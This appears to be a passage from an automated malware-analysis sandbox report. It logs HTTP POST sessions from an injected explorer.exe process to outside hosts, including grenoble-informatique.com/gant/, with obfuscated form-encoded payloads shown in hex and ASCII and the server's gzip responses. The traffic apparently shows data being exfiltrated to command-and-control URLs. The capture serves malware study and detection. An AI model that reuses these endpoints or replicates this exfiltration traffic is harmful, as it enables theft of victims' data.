4b 70 67 44 38 39 49 4e 41 48 50 74 42 65 6c 37 4d 5a 39 72 79 4f 79 68 69 30 6f 71 32 51 7e 57 78 4d 6c 6e 55 69 56 78 4e 42 4f 4e 6d 45 44 44 4b 6e 62 73 78 42 53 4c 57 35 77 65 44 7a 63 6f 28 6b 28 2d 35 33 30 30 7a 57 36 66 38 6d 51 6d 78 39 46 6a 53 49 61 67 64 74 52 4e 67 78 77 49 4e 6a 34 72 6d 45 34 67 66 59 50 65 38 32 53 30 4f 63 54 35 31 33 7a 70 51 75 65 6e 63 4f 73 71 68 31 52 2d 67 55 34 45 39 4b 53 6a 36 75 6d 39 4b 4c 4c 4e 41 45 7e 4e 59 31 31 35 41 61 31 31 6d 6e 61 61 48 30 41 63 66 44 6a 65 50 6b 67 64 6b 5f 46 42 33 64 61 45 4e 76 4a 31
                                                                                                                  Data Ascii: j-Jh9P=M2BtG-GbemBDMJPF5ObTmLEs39MF~O~uNMSZ2Vohqv54eiebmbh6pX0_jk~NOb5jC60oI1hoVLFsrJKrVr~lC96HTD17PO(6Mfm5hXdfVBmbOXOV1SEqeNpsuEPEOeis2qDOAsqBgB1D2vfIBhghFCELepgT1164aTJTSI(qnZNgNBjub7qnVSI6B_OpqKyH3zbBKsJFpE4-jxrv8HSu0zkkvrGIrjN0c3APK6i3OFhiWT7wH2toU2Q5UNY7WFcc57OpEAZuvlpLuaL2vQoGai(IWdZg8Jr1NC0s~S~U9XidU1BCCag_ZaLMm32KPvShyJzS2tJkeCRbRW80FORmm1M2WUEiNefLOWf2e_kle1efv_7mXR8KEd2vWq9IdcN3SHl51f3fDWD57moBFFQMue8NKDr7n_YaAKsOG5taXrcQlAIrvJFaifp5azVUfS2gpqvOvvX9U8AD73iVa2iiTG~IEBianlohT9Te4OoUqfLR0axediFiiZfOZwOvF6vCkfwOepg7uLVfzelOK9RkYXJePymd4t2C07Un82WlCmSLZzd9BH(FHfO83mUMUeLEq5zalXXeXyudTer_bR3xQYw1WDjlBPMcS3LqhescYF~ppDDf7iOmJbYU3ovbfGvNaOeJtShH53pGeM7AYyIihyrP1PzrW3tCpS(KvqN8kIhIeZ2Wi8xhPWZyapHPljC2X7I3UuFsOfGwwyP-nR~XQNCJD9I4YtnqlzCzcPuJxhkNFlv_InaVpjZqHXzuPlIExuI1hEhIbWAixUDctJ76z07KH5TWLuWwNHqpGK9HZGK5oDN7fq2AzHswVN3Ejlqfkn(jE91GOfMmU03VIxsYuPrGs3Aka_5Z(bzzAao4~k1HPSFL(2pr8g1rL3bvLW0w0BZzB6sE33DnnVDJASQOtF(5ofMDJ1C4Tz1znBapG_iQU19KEmyED-h2jACgSRe0ZE2qsW6WC12RTLKsGegOOv~zxipmonXPUd9y(BExrj12Y9Xq~GJSlhAtwVdaCGFxQwwyUU1lkN3Rp9RX0NDCInyvF2lgw18h5SF0WFymdSxsczVYXsIu2BiSYFWBLG4dQ9xUkoBSabZh7GTUiXSMn4Dmk8mW69z9IlTsGVcexZjOi-Jbelq9o8L-pkcHI0XuqvAW(gFyk1s3ToPyKpgD89INAHPtBel7MZ9ryOyhi0oq2Q~WxMlnUiVxNBONmEDDKnbsxBSLW5weDzco(k(-5300zW6f8mQmx9FjSIagdtRNgxwINj4rmE4gfYPe82S0OcT513zpQuencOsqh1R-gU4E9KSj6um9KLLNAE~NY115Aa11mnaaH0AcfDjePkgdk_FB3daENvJ1fBXZA4hXDYloyTxsGK~uERRchqk0PfAjbFnmk3eYSHhiPuLvp6y3lCGzpKStvKp_Y1AungOPshUNP85OYT(qHwEofXf69ddCMZvUTT6nKmfNz8j77mTVmBJujrFiiaFZZ3Ep6-FFg4fycFcq2GpfIJNl88MOQcPqHwXymrU01DHMEB3bK3qUSDVTDY1jQ0K49rfZfx(BANq2TxoZdA0NitHHJF~VdLvHFbnl~qODH-e6rzmglhzdLb1NZ5~0P-7Vg8PXySajU-teNjWTwBv0VptLc4BB3YBprokdb87qrODJg7WyZI0ctLx0j0(JYI6Y0G0Zj0UH8rLkhHNrSo1pdFlGfMikSt5RUg9t9kPYvJ(bwGAWSgGr~2Axvnvt3fNOh3K3A3h6acu1afqHoYTbB2ldeXGF11f8a0M0UtTwUdBdZxjeChHEZ_UTfOZRp-0K4a2KLggWjuAwzxJ5gRfUW6CNwGaKVBCkb1WRnFrcNbz0O7l2M1gdlf~5Gl8TTu46c8K3(V8-jm~rvrtvcqMVajkzLz7YIvrfWxH8~TP1XnuhSmN50dBs(2wZmHAd0CX0FlPhLM0fQ6XsUc9CSrWxK-ufv2e-jJO2bZFlU4s9~P~_mDHHfSYvIUQdGH(6FoqWRnwR4QjUPJcT1xTcQxkwF1MpyDyK5qDVo2e84bMD4NP0Ik(AJRgh(hmCqJqi~8i4pM5jJNwHbekpR1ee462PTAMtZjRyWb851q1PeOHuBbD-Q-b9JMyqMWub0NN19XseaQy52gqkSmhngNtwVpJBUkrGlm0NqOOZ1x25fbLpBSSGc4pf1NM5bXQcEz~uMPWDMEDYhSuaQHuaaXPi5ZDFI5U4QoEsVfJpoBKocsi770mxD90LMLly~AyuDZXhu5kR2-tyMYNYWHbkpS4lVcQnf_gl5ua2vaNijMY323r6(xP-VTKJ~ttWTv0ibYVrf3V5P8G0ialo3T11ZSo1fBzV7XACakSwtuFuqc(0NuHuzDWhSKhcWm2lNk0MSd1miZBnnqdgOHFcUmcWGyUu3Xw9BxDtbxX5ePd5kb1p5VXyRV54i_yecEWbFwukRTfPFDn2KtMd338OP4Uspj9S(b~CVnNB1e5WvNyBXB3zrosgs2MsfXYQkdVaZpaDCbChN9quzfyUL6Y-QYT_gqeaZzbj3SS4JiUy7yjKI2scdNvYmhy1kUPDQA5B8cNDajIqM1TNSlxZQ-OFNMyAHCbzUCpS6caLJqESYWVJkb5P2Pt3Adcav5E4ldUXult7(k6D4JdHHnEYbmmojtgrYd2NvZ(aSeGGEMNrxwk-vK76uCZ4960imgJJNSTRgkl5Yn(w1QzCRFD0vlqy~0huUyQTSnlaSqs8DnxJ0cgxZoyxDjEwyIyiIUCPFDmT(spkUUzWMjJ23bFDzJaTCX1wrSB0H4xcJAmynobMLLFD4Iyg7OVZSo1dHUCd8-oYtI0YiMEZESTUv7h5SI5Qs06Vi5(2BbNUbwVnG9gPbdUNDZC6vTySlBoP(BIrR8o3EyYZRvdEZFrq7oxn32~y(D2iWdovbUpomKN5YNxQ3nXiz4NItBADbYj7WJxyrZezJar3W2YRvcqlqBj5rZ2BuHxWP3K_0YLqI7iYz3jsxBhd6hQwvW9iMhwbruLKUKjMiZ6Af9yO7xRkAVhP(9gEGTFm2aFeqt1h1PxchFBUd1uYHWC5F0URQul0FbHQwgGxCU(kJxMxhhMTVsLE80mQ1xULSmQkzr0eqrkQRySY1_xkFOSFjPnE5j8s1iUzzUdUYCazQK6Bg4KnjfHWhup3URnUo-nzh-kHoGmFs1Y773fXWqqsLS7bUg3sgBgXF-E1k8Pr54OMMq9z7Ys-AzIhL5XOetPZqCrw1EBra4J3SioeuvbTJiHSuPj3OW78ArYq(dg6rSuNJNzCLLltYtlMF1POos4rIg1tNP09l572gJjOvd1tu_MaLAFivh51hFAzfewLd0oJgXMr57ETlHthykLI7-6bZwKVUTGx0un02PeLIV2S~oO2wqpCAdfw6591t_UuMwhDHfRa~UDYnuKsdngHuBAig_e1ZonktiKFohaMYvyzEioHQXcoI45BA9ArMzzl4Vr4MIEjiNSSnrdnSbJ9W2ImVf9wjXa9C_XVo_Mf9rX_6wcx5ybgu9oUxvSuFKc8wujB0iCaFeTlbAvaHZUzhMhCA1JQxtH48hERMRselX8337EQLyjgDP6oxDUl~g3SGnm8oRt6eeuSl6h1exkeqrSH3QkEXvk1VRuqhfNXGp529gtkxZGbpXeWVholW4TcTV61kiBdzibtugoIhBqZb4ZwSnL3tBcgXtKzpvYNGQmz6zpeck(OeiP4Bji9B020PcECJOvOJ3uJIIWNJ35pgAchkhDC1jwJbZvu1FrJfzvArbVN16ya(HM3~Tntyno3Ili8zbeSw7071Fe6TlH91JMEyCB9pdIVA4Q8S-LNF5O-AgsLr79m5MHCPqmYqRfLLqM39n6UfgClF95Y8q4sMWy3mrheYM8IB9CtEt(GTLJaJU6Da5WOqroXeLhN(rDztPW5aLw6lSFkarn_m8AmR4FMsEpKVrX_swOtvKw5b3Gqg0SuXTeCXN3oM01mpeep59WQZITVq-hcYKkfDd1c2hB7uQM1Yfx5pVbKX8ZyLq~nz1EgkOJduLsWTRgiC1X0aGUrXZRQyJ2Cz3G1NIw7u2DvD6QndkpdBSBPFWKuqp1
                                                                                                                  Feb 13, 2023 19:04:33.689488888 CET1203OUTData Raw: 30 41 6b 68 75 4a 31 65 39 73 56 64 4d 4a 75 51 5f 45 61 6c 6d 46 6f 31 4d 53 38 56 30 4d 5a 68 59 37 69 6e 55 78 76 6f 32 70 77 6a 48 38 35 30 42 28 49 46 4b 79 31 55 4e 6f 59 31 74 6e 45 39 67 61 49 74 57 4b 31 73 77 72 4a 56 6e 65 76 5a 71 6f
                                                                                                                  Data Ascii: 0AkhuJ1e9sVdMJuQ_EalmFo1MS8V0MZhY7inUxvo2pwjH850B(IFKy1UNoY1tnE9gaItWK1swrJVnevZqoe9B(QLn(hvGsp3poLsHBMcgDYTwedtj5V488n1zvnI9T5sOZcpbPccjjyW_Dp7d7T321NlCEBFNsflyAqtzinAcMJolS3(KJCU5D67v2prD0lol18xV7m62b7Aa1jBryvDi3IuHdiLpNXAwa6jBEGOBU8oojYypJE
                                                                                                                  Feb 13, 2023 19:04:33.881295919 CET1206OUTData Raw: 6e 39 43 58 58 56 58 7e 54 68 6b 58 6c 45 44 64 59 49 55 4e 45 54 4c 47 32 63 64 6f 53 43 69 6a 65 30 65 46 4b 4c 6a 57 35 4f 43 4d 34 48 6f 51 2d 37 71 6e 4c 64 73 73 56 7e 5f 78 41 61 79 79 30 64 7a 47 58 5a 34 59 50 28 65 59 56 63 74 6c 71 63
                                                                                                                  Data Ascii: n9CXXVX~ThkXlEDdYIUNETLG2cdoSCije0eFKLjW5OCM4HoQ-7qnLdssV~_xAayy0dzGXZ4YP(eYVctlqcKS8pr3wJgcjcX8_13~TFX5WSXi55Y5d(IymY6MA(ZCiNU58Dox-hA4DhbfqIWwggx94cjKzXAH-ZeXGHIasBmL8RXKpRNiqFa8mvbZaE1(FDMqc0SFws5GxPbgoKftu1WlRfR6-gCD0Wmb2RWijNvinrWhHnW7y2b
                                                                                                                  Feb 13, 2023 19:04:33.881386995 CET1212OUTData Raw: 36 57 47 30 52 42 5f 78 57 37 36 73 33 36 30 39 31 4c 37 38 37 56 62 43 62 76 39 61 4e 46 79 68 48 55 6d 38 79 72 57 76 78 63 5a 37 48 59 6e 30 62 37 74 69 47 37 59 33 50 70 6a 73 67 59 58 33 6a 68 71 37 33 54 43 42 4b 49 30 28 71 54 65 44 41 7e
                                                                                                                  Data Ascii: 6WG0RB_xW76s36091L787VbCbv9aNFyhHUm8yrWvxcZ7HYn0b7tiG7Y3PpjsgYX3jhq73TCBKI0(qTeDA~NEdVcbZTXuqF6xv3WGQ5FqGUN3z~urtX8B4RDAfsVN4FxxGvKRRvwqHQ2tX2ymmurYqIQRxiBAd2EDDViOm2M01gTTBLsIOnK4anT5gwP9T8gnhEfBV6VS7rN78lF9SSUpr6n7bopDw1vmMzwAv1ojz(dcd5fwFvp
                                                                                                                  Feb 13, 2023 19:04:33.881455898 CET1216OUTData Raw: 6d 57 4b 58 37 34 76 75 53 4d 76 45 42 4f 69 6e 75 6e 2d 51 67 65 78 47 42 28 58 6e 76 67 31 46 71 42 57 72 4b 39 41 6a 73 30 38 42 77 61 31 28 33 39 34 6c 65 50 2d 50 38 7a 33 6a 2d 35 5a 45 66 32 75 64 4a 33 63 49 72 53 72 62 35 38 4d 79 43 46
                                                                                                                  Data Ascii: mWKX74vuSMvEBOinun-QgexGB(Xnvg1FqBWrK9Ajs08Bwa1(394leP-P8z3j-5ZEf2udJ3cIrSrb58MyCFIgwa-Iasu0cQyKdehQbORvO3Quzw0kEBGCOE3j9uXBhSAWaIYQBmNu4coy8LCeTnSmtSj9LQVaoyixyUFMRGQ0FFykD0O74iTDbdTfDr_hek_C58M3iZFfkDPhwjMuszBgpJrHq9VZKxIlCLZ(AWCEDNiyisOtr(z
                                                                                                                  Feb 13, 2023 19:04:33.881851912 CET1225OUTData Raw: 63 39 46 58 6f 43 41 6c 5a 4c 33 47 37 5a 62 6e 45 69 6d 62 7a 75 55 45 6f 72 32 38 79 72 50 69 6d 57 5f 44 65 7a 68 71 66 45 5a 48 73 64 52 69 47 61 6b 72 2d 64 4b 31 58 4e 58 6e 79 63 5f 61 32 55 42 32 33 30 75 32 35 55 34 55 30 69 4d 63 72 42
                                                                                                                  Data Ascii: c9FXoCAlZL3G7ZbnEimbzuUEor28yrPimW_DezhqfEZHsdRiGakr-dK1XNXnyc_a2UB230u25U4U0iMcrBIwIltkQT7bN3C09n7zULpfy2lIcRZ0pAX38mltF6xWDrSL1BK~cebdUqT7BgLEho1eBfq9KZ9KEWIe9bahTe8czPCmHuyb01tyLf1QVP1q1YWoLuJMwA0v7Zcgr2dS2nk1aDo30TxXWAjjH5nK-ami61jNAxaXNDy
                                                                                                                  Feb 13, 2023 19:04:33.881949902 CET1229OUTData Raw: 79 76 4b 4b 54 67 64 30 6d 65 2d 76 61 38 62 62 42 52 59 7a 6a 75 74 47 34 6f 64 4a 4f 32 6c 71 76 68 58 4b 36 64 4a 67 75 31 6b 33 50 75 61 7e 78 54 45 59 6a 78 55 38 42 77 41 49 30 59 44 6c 6d 42 76 7a 74 6e 41 75 56 6f 6f 66 4c 4f 5a 66 30 6d
                                                                                                                  Data Ascii: yvKKTgd0me-va8bbBRYzjutG4odJO2lqvhXK6dJgu1k3Pua~xTEYjxU8BwAI0YDlmBvztnAuVoofLOZf0mj6LoyG9GbAvtRzDEOVYsGkZAS4rCE4XWnoLLh~SYow_Un(_VoEpfm0hiFmyrQkCCj6lZ7aDezkXdehVTfhMuRohcVWbGPtMAymxza6uwN1y(r58JA94RJKKqDupqvR2FRqf5JSfh80n~ziAC9nE9PdF73xFOzhUVZ
                                                                                                                  Feb 13, 2023 19:04:34.073712111 CET1232OUTData Raw: 65 66 6d 6a 4e 67 35 79 63 78 63 37 43 4b 76 46 66 77 4c 66 47 6f 4a 50 39 63 34 54 73 48 4e 28 4f 54 79 31 30 54 61 46 31 45 47 4e 5f 30 48 62 77 67 4d 35 59 52 47 44 5f 50 2d 33 35 6c 46 6d 6a 78 4a 4d 6b 42 31 6c 42 4e 74 78 30 75 76 56 70 4d
                                                                                                                  Data Ascii: efmjNg5ycxc7CKvFfwLfGoJP9c4TsHN(OTy10TaF1EGN_0HbwgM5YRGD_P-35lFmjxJMkB1lBNtx0uvVpMtOzfjrYyF37JydtEKQr~shHNGCkTNZmLkkbIhl_CwIfKqn86bOVZx6-zm49T4lM5CzbzoQLsPkrWgYxfL9Y2acj2PiDMQ744bE6H0RXGKQpPOiN5ouCrVitVviBMzIuqsJ4HZOZEc72t27wRXKK1_Z81srtvudeEX
                                                                                                                  Feb 13, 2023 19:04:34.073821068 CET1242OUTData Raw: 63 77 58 55 4c 30 6e 32 68 59 59 72 59 50 68 50 4f 30 56 69 31 43 4a 28 44 68 4f 6d 47 37 6d 67 2d 30 79 45 34 69 72 52 42 36 56 35 42 50 69 63 2d 7e 77 67 35 41 42 61 5f 31 42 48 4c 78 37 32 37 53 45 77 31 73 45 6b 6f 55 67 74 49 34 77 32 48 54
                                                                                                                  Data Ascii: cwXUL0n2hYYrYPhPO0Vi1CJ(DhOmG7mg-0yE4irRB6V5BPic-~wg5ABa_1BHLx727SEw1sEkoUgtI4w2HTO3nlSJaFI6XAZTWj2fuIuQPIOLPbzH9VQqt~J9mrc67CJGOEjn13TM9vJixXN74kYWDZzIuZO9YP3ri0qOKL7qYNwGENRSiG9W56n1zGK7x~9ZHqOs1ELP4qaPlc2qkI0FjGYVWkphRKNM0Du(u7Q9-LRpXuJsij7
                                                                                                                  Feb 13, 2023 19:04:34.073899031 CET1243OUTData Raw: 4e 55 62 46 4b 37 5f 55 38 6a 64 4f 61 48 50 66 33 46 4e 47 53 64 35 44 34 61 39 32 52 62 63 7a 72 4d 4f 6c 45 6c 70 73 6a 72 35 42 4b 72 73 35 45 6f 35 6b 67 62 70 61 50 31 52 48 72 47 67 37 4f 75 6d 28 4b 38 38 69 30 33 6d 49 46 4c 5a 68 39 67
                                                                                                                  Data Ascii: NUbFK7_U8jdOaHPf3FNGSd5D4a92RbczrMOlElpsjr5BKrs5Eo5kgbpaP1RHrGg7Oum(K88i03mIFLZh9gdX87Gc3JHutHEqqDt~y1OuQBCwOWj8_4_odHnD_eZ72X6s5NGzQXtOgOemI2YpT~1ataiGv85UFyCj41DY4D0VoFDH6DRYuzQ1AHQrioVkvZWCDTyijteQ-(dFtMI4AoGYKbW~J5Lqwn3SQABoUHyY2XhV7T5pAm8
                                                                                                                  Feb 13, 2023 19:04:34.586255074 CET1244INHTTP/1.1 404 Not Found
                                                                                                                  Connection: close
                                                                                                                  x-powered-by: PHP/8.0.27
                                                                                                                  expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                  cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                  content-type: text/html; charset=UTF-8
                                                                                                                  link: <https://dachmotors.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                  transfer-encoding: chunked
                                                                                                                  content-encoding: gzip
                                                                                                                  vary: Accept-Encoding
                                                                                                                  date: Mon, 13 Feb 2023 18:04:34 GMT
                                                                                                                  server: LiteSpeed
                                                                                                                  Data Raw: 63 62 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b4 5b 5b 73 db b6 12 7e ae 7f 05 cc cc b1 c9 16 a4 48 4a 94 64 3a 74 a6 4d d3 a7 f6 f4 4c 2f 4f 71 e6 0c 44 ae 28 24 14 c9 02 90 64 1f d5 ff fd 0c 40 4a bc 88 ba 58 4a 3d 13 47 04 76 bf 6f b1 bb 58 e2 22 bf bd 8e b2 50 3c e7 80 66 62 9e 3c 5c bd 95 ff a1 84 a4 71 a0 41 6a fe f9 bb 26 db 80 44 0f 57 df bc 9d 83 20 28 9c 11 c6 41 04 da 9f 7f fc 64 8e b5 87 ab 6f ca 8e 94 cc 21 d0 96 14 56 79 c6 84 86 c2 2c 15 90 8a 40 5b d1 48 cc 82 08 96 34 04 53 3d 60 44 53 2a 28 49 4c 1e 92 04 02 47 c2 bc 4d 68 fa 05 31 48 02 2d 67 d9 94 26 a0 a1 19 83 69 a0 cd 84 c8 b9 df eb c5 f3 3c b6 32 16 f7 9e a6 69 cf 29 94 04 15 09 3c fc 87 c4 80 d2 4c a0 69 b6 48 23 74 f3 66 ec 3a ce 3d fa e5 19 fd 90 64 f1 db 5e 21 75 55 8c 40 19 7a cb b2 49 26 f8 ed d6 cc db 39 79 32 e9 9c c4 60 e6 0c e4 30 fc 84 b0 18 6e 51 ef e1 aa b2 ed 36 4a b9 14 98 82 08 67 b7 85 81 b7 bd 5e 44 c2 d9 3c 13 19 e3 56 98 cd 5b 3a 1a 49 04 b0 94 08 d0 90 f4 75 a0 91 3c 4f 68 48 04 cd d2 1e e3 fc bb a7 79 a2 21 65 64 a0 95 46 a3 1b 46 fe 5a 64 f7 e8 27 80 a8 ed 89 26 5d 6f 0a 10 f5 b4 a6 a1 97 91 be cf e6 73 48 05 3f 85 3d 2c 65 eb 66 f0 90 d1 5c 3c 5c ad 68 1a 65 2b eb bf ab 1c e6 d9 67 fa 3b 08 41 d3 98 a3 00 ad b5 09 e1 f0 27 4b 34 bf 0c f0 63 ef b1 c7 ad 95 8c f0 63 4f 45 82 3f f6 c2 8c c1 63 4f 29 3f f6 9c 81 65 5b f6 63 6f e4 3e 8d dc c7 9e 86 35 78 12 9a af 59 79 1a 6b 58 e3 cb f8 3c 3c be 8c 15 1a 5f c6 1f 0a 40 be 54 80 d9 82 85 a0 f9 6b 2d cc d2 90 08 65 46 69 af 2f cd 6d c6 e1 b1 b7 ca 4d 9a 86 c9 22 02 fe d8 fb cc 55 83 52 32 19 24 40 38 58 73 9a 5a 9f f9 bb 25 b0 60 68 39 96 a3 bd bc dc 5f f5 be bd 46 7f cc 28 47 32 eb 11 e5 88 2c 44 66 c6 90 02 23 02 22 f4 6d ef ea 7a ba 48 43 99 2f 3a 60 82 85 b1 5e 12 86 52 cc 70 86 69 40 ac 90 01 11 f0 21 01 19 35 5d 0b 49 ba 24 5c 33 70 1e 50 2b 06 f1 5e ce c5 27 71 73 53 7f d2 35 37 d2 8c fb 0d 30 e2 3a 6c 80 49 f0 bb 60 34 8d ad 29 cb e6 ef 67 84 bd cf 22 c0 10 e8 b9 15 26 40 d8 6f 10 0a dd c6 36 a6 56 31 a1 a9 35 03 1a cf 84 81 73 6b 4a 93 e4 0f 78 12 3a b1 64 9e 3f eb 62 46 39 06 03 db d8 36 30 b5 44 f6 23 11 e4 cf df 7e d6 0d e3 9e 81 58 b0 14 9d 8f 2b 4a 5c 08 82 a0 81 fd b2 1d 58 a8 43 e1 2f b1 eb a9 22 51 35 e3 5e 58 9c 85 01 60 61 45 30 05 16 08 ab 98 aa d2 6f bd cf 64 49 4a 49 4c a4 43 4b 4f f3 1f 9e ff 20 f1 bf c9 1c 74 4d 56 49 cd f8 68 7f 92 a3 86 34 7a 3f a3 49 a4 0b e3 65 9a 31 3d 0b be 67 8c 3c eb da 34 21 32 b3 8a 4c 32 b0 b0 f8 22 97 f5 92 07 6b 58 02 7b 16 33 9a c6 fe b5 8d ab a7 0f 4f 21 e4 e2 a7 84 c8 f6 17 cc 02 fb 9e bd cd ac 04 d2 58 cc ee d9 77 df 19 15 ca c7 ec 23 fb f4 29 d8 0c 5d 0e 9c 4e f5 fc e6 a6 0a 8b c1 57 54 84 33 3d b7 e4 d0 7e
                                                                                                                  Data Ascii: cbc[[s~HJd:tML/OqD($d@JXJ=GvoX"P<fb<\qAj&DW (Ado!Vy,@[H4S=`DS*(ILGMh1H-g&i<2i)<LiH#tf:=d^!uU@zI&9y2`0nQ6Jg^D<V[:Iu<OhHy!edFFZd'&]osH?=,ef\<\he+g;A'K4ccOE?cO)?e[co>5xYykX<<_@Tk-eFi/mM"UR2$@8XsZ%`h9_F(G2,Df#"mzHC/:`^Rpi@!5]I$\3pP+^'qsS570:lI`4)g"&@o6V15skJx:d?bF960D#~X+J\XC/"Q5^X`aE0odIJILCKO tMVIh4z?Ie1=g<4!2L2"kX{3O!Xw#)]NWT3=~
                                                                                                                  Feb 13, 2023 19:04:34.586357117 CET1246INData Raw: 20 1c 12 9a 42 a0 89 2c d7 64 f4 32 59 b3 87 b6 8d fa 6e fe 84 be 67 94 24 1a 06 63 1d 12 0e 85 f9 7e 19 34 ae 7f 74 dc d1 dd 78 84 87 9e dd bf c3 63 d7 f6 f0 dd f8 ce 2b 9e 3f e1 9d ee 7e bd db 78 77 ed f8 d7 5c ff e8 79 7d 6f 88 bd e1 d8 1d e2
                                                                                                                  Data Ascii: B,d2Yng$c~4txc+?~xw\y}ogn]6nnj~q~-vubV/o6NKo6`W.kLb9>FXz+|EtH7Eye2-zsS5<vsW5*oq]5q&u(
                                                                                                                  Feb 13, 2023 19:04:34.586436033 CET1247INData Raw: ee d1 34 9a d3 28 95 e5 f0 30 07 56 5b a9 2d fe c0 c6 8e 33 c4 ae b7 27 7a d1 22 13 59 0a a6 19 11 f6 45 bd ce d5 09 a7 8f 16 2c d1 6f df ac 72 73 23 d1 14 b8 6d d7 ec 8d d8 41 0c b9 5c 50 f8 fb d5 8b 09 62 3e 43 92 c8 c5 eb 8e 19 8d fe fd 30 93
                                                                                                                  Data Ascii: 4(0V[-3'z"YE,ors#mA\Pb>C0dBaa_2!dm%zwY!ULN$I|&$,!)uDY1ilk0`0o+sw@bhC"#G}?>2}YP
                                                                                                                  Feb 13, 2023 19:04:34.591761112 CET1248INData Raw: 36 33 34 0d 0a ec 5c 5d 6f db 36 14 7d 4e 7e 05 a1 a2 ed c3 a0 4f 4b 96 95 c8 2e da 6c cb fa 50 60 48 ba ed 59 b1 68 9b 89 2c 6a a4 1c 27 ff 7e b8 97 a4 4c b9 89 9b 04 35 50 cc f1 8b e5 2b 7e 5c 91 47 94 cc 7b ce b5 04 18 8a 81 b5 a1 ab 2d 20 b4
                                                                                                                  Data Ascii: 634\]o6}N~OK.lP`HYh,j'~L5P+~\G{- iI0I#L[M<@V=|CVj&yrVsVKk/D`bZy0ugyjk{Dg|iq%9)p++2$=UhJ`x>% Ao
                                                                                                                  Feb 13, 2023 19:04:34.591852903 CET1248INData Raw: c0 21 a4 89 84 8f 4e 6e 88 c7 38 18 70 94 fb 8b d0 14 38 ca 9b 9e 0f 25 55 51 35 c6 eb 9e 27 5f ee c9 26 74 02 49 1e 55 43 8d 6e 27 f7 4b 76 3b 39 86 5e f5 61 8e 41 15 2a 20 24 53 b0 1a 83 0a 66 a2 7a 3d c2 59 33 cc 78 8c 4d 9a 39 d3 38 68 20 4f
                                                                                                                  Data Ascii: !Nn8p8%UQ5'_&tIUCn'Kv;9^aA* $Sfz=Y3xM98h O6};Z%PL%WT%o;vc~f%7T^B8.N~Y^}q>Wp>uBS} fmtjOFgBAk7UE%>
                                                                                                                  Feb 13, 2023 19:04:34.594266891 CET1248INData Raw: 61 0d 0a 03 00 80 74 0a 34 03 56 00 00 0d 0a
                                                                                                                  Data Ascii: at4V
                                                                                                                  Feb 13, 2023 19:04:34.594343901 CET1249INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  5192.168.11.2049844217.160.0.3780C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 13, 2023 19:00:05.232058048 CET454OUTPOST /gant/ HTTP/1.1
                                                                                                                  Host: www.grenoble-informatique.com
                                                                                                                  Connection: close
                                                                                                                  Content-Length: 51816
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Origin: http://www.grenoble-informatique.com
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Accept: */*
                                                                                                                  Referer: http://www.grenoble-informatique.com/gant/
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Data Raw: 6a 2d 4a 68 39 50 3d 37 4c 6a 58 42 39 4a 61 38 36 65 70 50 77 74 69 33 4e 30 61 45 66 55 46 68 30 43 37 44 5a 67 6e 52 70 6d 6b 28 32 69 52 48 6c 38 61 6f 6d 59 49 76 45 6a 69 75 4e 56 4c 47 55 52 6f 54 5a 70 4d 47 72 68 45 6d 61 76 35 63 4a 47 6a 35 36 31 64 46 39 51 76 78 2d 70 48 39 57 56 6e 58 50 49 72 44 48 4d 55 6c 37 41 34 64 65 65 42 54 72 79 6c 34 75 31 56 70 39 74 79 43 4f 65 4a 35 41 59 37 4d 65 7a 77 31 53 36 7a 4e 48 7a 57 38 4a 39 74 59 31 54 73 72 33 39 51 5a 4b 6c 42 32 6f 78 33 52 73 74 79 4f 72 4e 38 70 38 5a 6e 47 5a 52 65 32 77 74 2d 36 37 42 41 4e 68 66 4e 73 47 69 64 4d 63 49 45 45 61 44 32 54 46 42 59 6c 33 6b 55 49 57 55 55 36 6b 37 54 5a 62 61 75 46 79 33 6b 66 43 70 31 6f 64 52 55 47 31 53 35 4a 33 4e 43 65 43 58 6f 73 6a 33 4d 38 34 53 4e 70 72 63 32 36 67 78 4e 38 78 48 71 41 5a 59 6e 73 33 62 30 6b 71 71 4c 55 64 65 78 66 71 6e 68 6e 65 4c 42 41 66 69 47 62 61 79 54 52 47 75 73 42 4c 69 4a 42 6e 70 32 6a 50 6a 4f 35 6f 36 41 6c 5a 6f 47 48 34 74 6e 6d 6f 41 32 6b 6a 50 58 7e 69 79 32 34 58 35 70 7e 69 78 4c 28 4b 35 4a 50 45 50 6a 4e 71 55 65 51 41 44 57 61 32 71 6f 36 67 79 48 66 33 39 39 34 73 66 77 6b 63 58 31 67 56 43 48 6f 47 6a 51 41 65 6c 67 49 31 30 74 47 56 28 4d 59 6f 67 6b 48 56 28 43 67 76 78 6f 28 4a 74 50 70 4d 39 58 77 56 52 6a 38 6b 48 5a 59 77 44 6d 79 41 48 75 68 58 38 57 53 6c 72 5a 33 70 78 57 37 75 33 30 54 38 28 41 4e 70 6b 61 53 58 6a 79 33 67 55 48 44 37 65 52 5a 77 33 66 32 54 4a 72 44 69 71 63 50 48 72 73 35 6e 54 48 72 5f 53 4d 43 37 73 49 30 67 67 46 31 72 78 55 45 54 52 4e 79 63 45 72 79 77 45 65 62 37 35 57 63 6a 75 43 70 43 49 63 33 6a 4c 74 71 5a 48 51 74 67 74 67 67 6c 47 43 42 2d 44 61 62 77 6a 69 7a 51 4a 67 70 41 5a 65 54 53 33 4c 76 71 56 47 4e 42 73 67 65 5a 4a 5a 4e 53 34 73 4f 7a 79 2d 58 76 7a 36 75 61 45 33 4b 78 57 70 57 38 69 59 74 73 44 38 6e 5f 77 73 64 53 66 6e 50 65 43 54 6d 42 58 79 6e 74 62 7a 44 76 62 47 51 4e 62 32 31 47 51 56 44 61 6b 59 4c 6d 62 6a 62 62 38 47 34 56 4e 41 67 50 4a 62 56 65 59 6c 44 67 51 54 74 47 55 51 79 4d 74 61 7e 5f 4c 32 73 72 64 75 57 52 46 6e 73 53 7a 71 5a 57 46 69 4c 61 39 38 32 70 76 57 52 6a 38 4e 7a 42 4d 37 48 75 33 75 35 79 42 76 41 62 6b 4c 66 61 50 44 41 33 4d 4a 